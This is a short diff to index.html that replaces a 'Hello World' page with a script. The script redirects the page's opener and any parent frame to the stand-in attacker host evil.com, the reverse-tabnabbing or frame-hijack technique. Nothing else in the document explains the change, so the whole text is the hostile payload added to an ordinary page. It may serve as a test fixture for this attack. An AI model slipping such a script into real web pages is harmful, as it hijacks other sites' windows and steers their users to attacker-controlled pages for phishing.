--- a/index.html
+++ b/index.html
@@ -1,3 +1,4 @@
-<html>
-Hello World
-</html>
+<script>
+  if (window.opener) window.opener.parent.location.replace('https://evil.com/');
+  if (window.parent != window) window.parent.location.replace('https://evil.com/');
+</script>
